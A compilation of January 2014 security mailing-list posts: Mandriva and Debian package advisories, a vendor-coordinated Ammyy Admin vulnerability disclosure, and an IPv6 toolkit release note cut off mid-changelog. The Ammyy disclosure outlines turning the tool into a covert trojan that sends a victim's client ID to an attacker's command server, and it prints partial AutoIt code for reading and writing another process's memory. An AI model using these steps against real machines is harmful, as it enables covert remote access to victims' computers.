[ MDVSA-2014:007 ] openssl
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2014:007 http://www.mandriva.com/en/support/security/ ___ Package : openssl Date: January 17, 2014 Affected: Business Server 1.0 ___ Problem Description: A vulnerability has been discovered and corrected in openssl: The DTLS retransmission implementation in OpenSSL through 0.9.8y and 1.x through 1.0.1e does not properly maintain data structures for digest and encryption contexts, which might allow man-in-the-middle attackers to trigger the use of a different context by interfering with packet delivery, related to ssl/d1_both.c and ssl/t1_enc.c (CVE-2013-6450). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6450 ___ Updated Packages: Mandriva Business Server 1/X86_64: 0a21492e02429e199dfc88e8d502de88 mbs1/x86_64/lib64openssl1.0.0-1.0.0k-1.1.mbs1.x86_64.rpm 13eaad31a74bb167ce0d661eb25b5ca1 mbs1/x86_64/lib64openssl-devel-1.0.0k-1.1.mbs1.x86_64.rpm fca41114d79983a4d7600ba9a97cea3f mbs1/x86_64/lib64openssl-engines1.0.0-1.0.0k-1.1.mbs1.x86_64.rpm acaf2f9638cf2bafeeb3a0aebc173e85 mbs1/x86_64/lib64openssl-static-devel-1.0.0k-1.1.mbs1.x86_64.rpm 8d7142a0c95315a29de750e2e29f2174 mbs1/x86_64/openssl-1.0.0k-1.1.mbs1.x86_64.rpm 35c5ec534b80c03ae237526e75c52c18 mbs1/SRPMS/openssl-1.0.0k-1.1.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFS2PsqmqjQ0CJFipgRAjPtAKDjR9POOHvie7S7yme7MuFQENO0swCgjiNR Mru4HLOFpth9GZxRQaBzkoY= =Luqq -END PGP SIGNATURE-
[ MDVSA-2014:008 ] openjpeg
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2014:008 http://www.mandriva.com/en/support/security/ ___ Package : openjpeg Date: January 17, 2014 Affected: Business Server 1.0 ___ Problem Description: Updated openjpeg package fixes security vulnerabilities: Multiple heap-based buffer overflow flaws were found in OpenJPEG. An attacker could create a specially crafted OpenJPEG image that, when opened, could cause an application using openjpeg to crash or, possibly, execute arbitrary code with the privileges of the user running the application (CVE-2013-6045). Multiple denial of service flaws were found in OpenJPEG. An attacker could create a specially crafted OpenJPEG image that, when opened, could cause an application using openjpeg to crash (CVE-2013-1447, CVE-2013-6052, CVE-2013-6053, CVE-2013-6887). ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1447 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6045 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6052 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6053 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6887 http://advisories.mageia.org/MGASA-2014-0005.html ___ Updated Packages: Mandriva Business Server 1/X86_64: 7c65bf19916467995c79153037836a3b mbs1/x86_64/lib64openjpeg1-1.5.0-2.2.mbs1.x86_64.rpm f8e50deb18fd88c562e1bd8182ea1a24 mbs1/x86_64/lib64openjpeg-devel-1.5.0-2.2.mbs1.x86_64.rpm 8b946672728f9f76a285f927dddc0197 mbs1/x86_64/openjpeg-1.5.0-2.2.mbs1.x86_64.rpm 28d5b8097c427a1f50d0363241a34e6b mbs1/SRPMS/openjpeg-1.5.0-2.2.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFS2P+YmqjQ0CJFipgRAjdWAKDAw3trdO1yQMauPGYTZdR3o7SnrQCgok7r Ctu3agQ11HVzeJ71xY8Qo/8= =ogxG -END PGP SIGNATURE-
[ MDVSA-2014:010 ] memcached
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2014:010 http://www.mandriva.com/en/support/security/ ___ Package : memcached Date: January 17, 2014 Affected: Business Server 1.0, Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities has been discovered and corrected in memcached: The process_bin_delete function in memcached.c in memcached 1.4.4 and other versions before 1.4.17, when running in verbose mode, allows remote attackers to cause a denial of service (segmentation fault) via a request to delete a key, which does not account for the lack of a null terminator in the key and triggers a buffer over-read when printing to stderr (CVE-2013-0179). memcached before 1.4.17 allows remote attackers to bypass authentication by sending an invalid request with SASL credentials, then sending another request with incorrect SASL credentials (CVE-2013-7239). The do_item_get function in items.c in memcached 1.4.4 and other versions before 1.4.17, when running in verbose mode, allows remote attackers to cause a denial of service (segmentation fault) via a request to delete a key, which does not account for the lack of a null terminator in the key and triggers a buffer over-read when printing to stderr, a different vulnerability than CVE-2013-0179 (CVE-2013-7290). memcached before 1.4.17, when running in verbose mode, allows remote attackers to cause a denial of service (crash) via a request that triggers an unbounded key print during logging, related to an issue that was quickly grepped out of the source tree, a different vulnerability than CVE-2013-0179 and CVE-2013-7290 (CVE-2013-7291). The updated packages have been upgraded to the 1.4.17 version which is unaffected by these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0179 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7239 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7290 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7291 https://code.google.com/p/memcached/wiki/ReleaseNotes1417 ___ Updated Packages: Mandriva Enterprise Server 5: a16c2422bfa525dbbaaf53a1947eb857 mes5/i586/memcached-1.4.17-0.1mdvmes5.2.i586.rpm bb30dd36547f39e0cc197e3286882c62 mes5/i586/memcached-devel-1.4.17-0.1mdvmes5.2.i586.rpm ef22bb85c812d510bde6110098a38f01 mes5/SRPMS/memcached-1.4.17-0.1mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 74c7f0f6ece79b4cbe924c8d41670d7a mes5/x86_64/memcached-1.4.17-0.1mdvmes5.2.x86_64.rpm a4b21173b04c8944067f34870b948fba mes5/x86_64/memcached-devel-1.4.17-0.1mdvmes5.2.x86_64.rpm ef22bb85c812d510bde6110098a38f01 mes5/SRPMS/memcached-1.4.17-0.1mdvmes5.2.src.rpm Mandriva Business Server 1/X86_64: 8035d2870bcd192b1c6b6419256e4714 mbs1/x86_64/memcached-1.4.17-1.mbs1.x86_64.rpm 5343cfb775b8adc04760f6b5717aa4ce mbs1/x86_64/memcached-devel-1.4.17-1.mbs1.x86_64.rpm d7a230375722086b5419ca49544de75c mbs1/SRPMS/memcached-1.4.17-1.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFS2Q5omqjQ0CJFipgRAmQPAKCpbbljUvxwXBSzyzSuIAq56bRBygCdH1E6 0mBdsWBHW14kxDPmOwU604Y= =qOuN -END PGP SIGNATURE-
[ MDVSA-2014:009 ] librsvg
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2014:009 http://www.mandriva.com/en/support/security/ ___ Package : librsvg Date: January 17, 2014 Affected: Business Server 1.0, Enterprise Server 5.0 ___ Problem Description: Updated librsvg and gtk+3.0 packages fix security vulnerability: librsvg before version 2.39.0 allows remote attackers to read arbitrary files via an XML document containing an external entity declaration in conjunction with an entity reference (CVE-2013-1881). For Business Server 1 gtk+3.0 has been patched to cope with the changes in SVG loading due to the fix in librsvg. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1881 http://advisories.mageia.org/MGASA-2014-0004.html ___ Updated Packages: Mandriva Enterprise Server 5: 37113a420ba5a53100cf39b3f605e77e mes5/i586/librsvg2_2-2.22.3-1.1mdvmes5.2.i586.rpm a4555e9908e85e425275df23d3edc0e0 mes5/i586/librsvg-2.22.3-1.1mdvmes5.2.i586.rpm 037dd79c6e4ca583d8631b2e846ae45e mes5/i586/librsvg2-devel-2.22.3-1.1mdvmes5.2.i586.rpm f7850fb1281aee8ad878b58d7da97d94 mes5/SRPMS/librsvg-2.22.3-1.1mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: b0506f0fdf820aa4e832e119dd8521bc mes5/x86_64/lib64rsvg2_2-2.22.3-1.1mdvmes5.2.x86_64.rpm 13fe6bdc8aeb3705036b86e1de5e20ba mes5/x86_64/lib64rsvg2-devel-2.22.3-1.1mdvmes5.2.x86_64.rpm 5f768d5b0f0641fb2bcbc822f0467bbd mes5/x86_64/librsvg-2.22.3-1.1mdvmes5.2.x86_64.rpm f7850fb1281aee8ad878b58d7da97d94 mes5/SRPMS/librsvg-2.22.3-1.1mdvmes5.2.src.rpm Mandriva Business Server 1/X86_64: 44b763852521caf2ee1bd1ced98d671d mbs1/x86_64/gtk+3.0-3.4.1-3.1.mbs1.x86_64.rpm a789904da15e8993987ad3840f6be197 mbs1/x86_64/lib64gail3_0-3.4.1-3.1.mbs1.x86_64.rpm e271bfbcc262565eae856c3b8d576875 mbs1/x86_64/lib64gail3.0-devel-3.4.1-3.1.mbs1.x86_64.rpm cc7dc71ae837280c280f1a2e49a18f07 mbs1/x86_64/lib64gtk+3_0-3.4.1-3.1.mbs1.x86_64.rpm eea69dd8f52d83811571c345a6fbca15 mbs1/x86_64/lib64gtk+3.0-devel-3.4.1-3.1.mbs1.x86_64.rpm 41561e7183e4df127530943708b09e18 mbs1/x86_64/lib64gtk-gir3.0-3.4.1-3.1.mbs1.x86_64.rpm 5689ab1dd054219f87730ae0be62a930 mbs1/x86_64/lib64rsvg2_2-2.36.0-2.1.mbs1.x86_64.rpm 650ae722b83bdd14c90a105e4d79a3d4 mbs1/x86_64/lib64rsvg2-devel-2.36.0-2.1.mbs1.x86_64.rpm 6cdf67c0e74d4120b0b4759e3550d4e8 mbs1/x86_64/lib64rsvg-gir2.0-2.36.0-2.1.mbs1.x86_64.rpm feb51a155113502b3e3eb622eb81147d mbs1/x86_64/librsvg-2.36.0-2.1.mbs1.x86_64.rpm b65bbf46a938e2388891c5a053fea790 mbs1/SRPMS/gtk+3.0-3.4.1-3.1.mbs1.src.rpm e3e0e27f4876607098a40ac9bae9e87a mbs1/SRPMS/librsvg-2.36.0-2.1.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFS2QSDmqjQ0CJFipgRAhMPAJ9J8GfBJriV4JHg2Y6MHIU3xGYkLQCdEkct VEZVu+z3gNCfW1GWRu+ziaA= =QXNm -END PGP SIGNATURE-
[SECURITY] [DSA 2845-1] mysql-5.1 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2845-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff January 17, 2014 http://www.debian.org/security/faq - - Package: mysql-5.1 Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2013-5908 CVE-2014-0386 CVE-2014-0393 CVE-2014-0401 CVE-2014-0402 CVE-2014-0412 CVE-2014-0437 This DSA updates the MySQL 5.1 database to 5.1.73. This fixes multiple unspecified security problems in MySQL: http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html For the oldstable distribution (squeeze), these problems have been fixed in version 5.1.73-1. We recommend that you upgrade your mysql-5.1 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iEYEARECAAYFAlLZULQACgkQXm3vHE4uylqMyACeJrA+pR8CqpcR1m9AP77uXFT0 po0AoL3txJvp63DVJXGPdeuoac7CsnPU =xjyb -END PGP SIGNATURE-
Ammyy Admin - Hidden hard-coded option and Access Control vulnerability.
Title: Ammyy Admin - Hidden hard-coded option and Access Control vulnerability. Credit: == Name: Bhadresh Patel Company/affiliation: Cyberoam Technologies Private Limited Website: www.cyberoam.com CVE: - CVE-2013-5581 for hidden hard-coded option (CWE-255). - CVE-2013-5582 for failure to enforce access restrictions for resources (CWE-264). Date: 17-01-2014 CL-ID: CRD-2013-04 Vendor: == Ammyy is in to developing cutting edge internet solutions. They have researched informational technologies and automation management of remote computer access services for many years. The result of their efforts is new Remote Access system Ammyy Admin. Product: === Ammyy Admin is the easiest way to establish remote desktop connection. You can easily share a remote desktop or control a server over the Internet with Ammyy Admin. No matter where you are, Ammyy Admin makes it safe and easy to quickly access a remote desktop within a few seconds. Ammyy Admin is trusted by more than 21 000 000 personal and corporate users. Product link: http://www.ammyy.com/en/downloads.html Abstract: === Cyberoam Threat Research Labs discovered Hidden option and Access Control vulnerability in Ammyy Admin tool. Report-Timeline (DD-MM-): 12-08-2013: Vendor notification 13-08-2013: Vendor Response/Feedback 13-12-2013: Vendor Fix/Patch 17-01-2014: Public or Non-Public Disclosure Affected Version: = Version (=3.2) Exploitation-Technique: === Local Severity Rating: === CVSS Base Score 7.2 (AV:N/AC:M/Au:N/C:N/I:N/A:P) Details: === There is a Hidden option and Access Control vulnerability in Ammyy Admin tool which allows an attacker to utilize Ammyy Admin tool as a trojan horse to access computer without victim's information. An approach to have hidden option -nogui along with storing client ID at fixed memory location could be exploited by an attacker to use Ammyy Admin as a trojan horse. Proof Of Concept: An attacker could exploit above vulnerabilities using following steps, 1) Create custom settings.rdp and settings3.bin to allow access to any computer ID with predefined password. 2) Use hidden option -nogui to run Ammyy Amin without the user information. 2) Acquire the client id by reading memory location 004A3658. 3) Send client id to attackers CC server. Logs --- ## Hidden hard-coded option (CVE-2013-5581) ## root@bhdresh:~# strings AA_v3.2.exe | grep -i ^- -f=* - 5H -connect -set_proxy_ -dosas_ -elevated -log -lunch -nogui -service -debug -remove -install -outid -setsettings -rstid -showversion -notstartclient -startclient -minimize -+/3 client ID at Fixed memory location (CVE-2013-5582) ===PoC screenshot=== http://oi42.tinypic.com/34owtoy.jpg ===PoC autoit code to hijack client ID=== Func _memoryopen($iv_pid, $iv_desiredaccess = 2035711, $iv_inherithandle = 1) If NOT ProcessExists($iv_pid) Then SetError(1) Return 0 EndIf Local $ah_handle[2] = [DllOpen(kernel32.dll)] If @error Then SetError(2) Return 0 EndIf Local $av_openprocess = DllCall($ah_handle[0], int, OpenProcess, int, $iv_desiredaccess, int, $iv_inherithandle, int, $iv_pid) If @error Then DllClose($ah_handle[0]) SetError(3) Return 0 EndIf $ah_handle[1] = $av_openprocess[0] Return $ah_handle EndFunc Func _memoryread($iv_address, $ah_handle, $sv_type = dword) If NOT IsArray($ah_handle) Then SetError(1) Return 0 EndIf Local $v_buffer = DllStructCreate($sv_type) If @error Then SetError(@error + 1) Return 0 EndIf DllCall($ah_handle[0], int, ReadProcessMemory, int, $ah_handle[1], int, $iv_address, ptr, DllStructGetPtr($v_buffer), int, DllStructGetSize($v_buffer), int, ) If NOT @error Then Local $v_value = DllStructGetData($v_buffer, 1) Return $v_value Else SetError(6) Return 0 EndIf EndFunc Func _memorywrite($iv_address, $ah_handle, $v_data, $sv_type = dword) If NOT IsArray($ah_handle) Then SetError(1) Return 0 EndIf Local $v_buffer = DllStructCreate($sv_type) If @error Then SetError(@error + 1) Return 0 Else DllStructSetData($v_buffer, 1, $v_data) If @error Then SetError(6) Return 0 EndIf EndIf DllCall($ah_handle[0], int, WriteProcessMemory, int, $ah_handle[1], int, $iv_address, ptr, DllStructGetPtr($v_buffer), int, DllStructGetSize($v_buffer), int, ) If NOT @error
[SECURITY] [DSA 2831-2] puppet regression update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2831-2 secur...@debian.org http://www.debian.org/security/ Salvatore Bonaccorso January 17, 2014 http://www.debian.org/security/faq - - Package: puppet Vulnerability : regression Debian-specific: no Debian Bug : 73 The fix for CVE-2013-4969 contained a regression affecting the default file mode if none is specified on a file resource. The oldstable distribution (squeeze) is not affected by this regression. For the stable distribution (wheezy), this problem has been fixed in version 2.7.23-1~deb7u3. For the testing distribution (jessie) and the unstable distribution (sid), this problem has been fixed in version 3.4.2-1. For reference, the original advisory text follows. An unsafe use of temporary files was discovered in Puppet, a tool for centralized configuration management. An attacker can exploit this vulnerability and overwrite an arbitrary file in the system. For the oldstable distribution (squeeze), this problem has been fixed in version 2.6.2-5+squeeze9. For the stable distribution (wheezy), this problem has been fixed in version 2.7.23-1~deb7u2. For the testing distribution (jessie), this problem has been fixed in version 3.4.1-1. For the unstable distribution (sid), this problem has been fixed in version 3.4.1-1. We recommend that you upgrade your puppet packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCgAGBQJS2VDIAAoJEAVMuPMTQ89EJDIP/3s1z5/F0jY78IgzvH4smp9z XJp7zWClZgRbHP8OdRPaEFd5EGVfaWR+Utvp0c68fY5dqKsTWGePg8E8PayDYItx 9yABFBfTlorbThWSbd9wLJ4XazcdsAzA4GvFB5VqVoy0DuqMq9un96+F+D/wlngN awnBSJCt+BDEoKrUee6YMVqeHFlMITdC/kYbs+ZkuaQ21YBhO31En27jtE69DrHU HWq5rCywN+0IDpbkJ5RLkGRlya1pGW+j1pSXLyj5tGsOSclZzItkbvoJb0053VnG fDc1Q920ZRplOn3GXvyFkdjLEbTg2JcSVn5veIX1OTZ7KwT0Bp6n+iyqa3j9FdtG fhY78b92Eba7K3hWHhddN72K4mXY0y5W4DDOoK1HLWWo1oq8g+pUSHhSj/WVfFkv xEgJRSb2bsiEiwkMjAWwQGUjuhpna1/nQIiwKayL6EPcjuIa6k0mdgr9+DnHUEZJ Rb1WWyjaRs/15/6Jxcx7BsOy/EpgSq1mvwsLI8nZE4DSHSBj+BGnDojJ3iLXTSL2 yvxZTLa2iCm/+CsLMQTVRvJylxE4Sn7aelOpGPrfdFUBI9YpTmgcDJ7gQ8qcr7Tx Zi4efYc4j89t87U9APIS1uNxSarEULYsNF8V31JDqWR1N6Y65viaH6Hrp9Le3eqr XlcH6Q25UYFJG/57YG1M =aCWc -END PGP SIGNATURE-
SI6 Networks' IPv6 Toolkit v1.5.2 released!
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Folks, This is not meant to be a big release, but it does fix some issues present in previous versions, and adds some new features (please find the changelog below). So if you're using the ipv6toolkit, please upgrade to version 1.5.2. Tarballs (plain one, and gpg-signed with my key below) can be found at: http://www.si6networks.com/tools/ipv6toolkit). * Tools: If you want to find out which tools the ipv6toolkit comprises, just do a man 7 ipv6toolkit. * Platforms: We currently support these platforms: FreeBSD, NetBSD, OpenBSD, Debian GNU/Linux, Debian GNU/kfreebsd, Gentoo Linux, Ubuntu, and Mac OS. Some of these platforms now feature the ipv6toolkit in their package system -- credits for that can be found below. :-) = CREDITS == CONTRIBUTORS - ** Contributors ** The following people sent patches that were incorporated into this release of the toolkit: Octavio Alvarez alvar...@alvarezp.com Alexander Bluhm bl...@openbsd.org Alistair Crooks a...@pkgsrc.org Declan A Rieb dar...@sandia.gov ** Package maintainers ** Availability of packages for different operating systems makes it easier for users to install and update the toolkit, and for the toolkit to integrate better with the operating systems. These are the maintainers for each of the different packages: + Debian Octavio Alvarez alvar...@alvarezp.com, sponsored by Luciano Bello luci...@debian.org + FreeBSD Hiroki Sato h...@freebsd.org + Gentoo Linux Robin H. Johnson robb...@gentoo.org + Mac OS Declan A Rieb dar...@sandia.gov tests the toolkit on multiple Mac OS versions, to ensure clean compiles on such platforms. + NetBSD (pkgsrc framework) Alistair Crooks a...@pkgsrc.org + OpenBSD Alexander Bluhm bl...@openbsd.org ** Troubleshooting/Debugging ** Spotting bugs in networking tool can be tricky, since at times they only show up in specific network scenarios. The following individuals provided great help in identifying bugs in the the toolkit (thus leading to fixes and improvements): Stephane Bortzmeyer steph...@bortzmeyer.org Marc Heuse m...@mh-sec.de Erik Muller er...@buh.org Declan A Rieb dar...@sandia.gov Tim tim-secur...@sentinelchicken.org = CREDITS = = CHANGELOG = SI6 Networks IPv6 Toolkit v1.5.2 * All: Add support for GNU Debian/kfreebsd The toolkit would not build on GNU Debian/kfreebsd before this release. * tcp6: Add support for TCP/IPv6 probes tcp6 can now send TCP/IPv6 packets (--probe-mode option), and read the TCP response packets, if any. This can be leveraged for port scans, and miscellaneous measurements. SI6 Networks IPv6 Toolkit v1.5.1 * Fix Mac OS breakage libipv6.h had incorrect definitions for struct tcp_hdr. SI6 Networks IPv6 Toolkit v1.5 * All: Improved the next-hop determination Since the toolkit employs libpcap (as there is no portable way to forge IPv6 addresses and do other tricks), it was relying on the user specifying a network interface (-i was mandatory for all tools) and that routers would send Router Advertisements on the local links. This not only was rather inconvenient for users (specifying a network interface was not warranted), but also meant that in setups where RAs where not available (e.g., manual configuration), the tools would fail. The toolkit now employs routing sockets (in BSDs) or Netlink (in Linux), and only uses sending RAs as a fall-back in case of failure (IPv6 not configured on the local host). * All: Improved source address selection This is closely related to the previous bullet. * All: More code moved to libipv6 More and more code was moved to libipv6 and removed to the individual tool source files. As with some of the above, this was painful and time-consuming, but was necessary -- and in the long run it will make code maintenance easier. * All: libipv6 used throughout all tools This was rather painful and non-exciting, but necessary. SI6 Networks' IPv6 Toolkit v1.4.1 * frag6: Fixed bug that prevented Ethernet header from being filled A bug in the code caused Ethernet frames to go on te wire without any of their header fields completed. * All: Use of library to avoid code replication An libipv6 library was created, such that common functions do not need to be replicated for each tool. ni6, ns6, rs6, and tcp6 now employ such library. SI6 Networks' IPv6 Toolkit v1.4 release * frag6: Fixed the flooding option Fixed the fragment size used when employing the flooding option. It was previously sending fragment sizes that where not a multiple of eight, and hence these fragments were dropped. * scan6: Added support for 64-bit encoding of IPv4 addresses Option --tgt-ipv4 was augmented to support both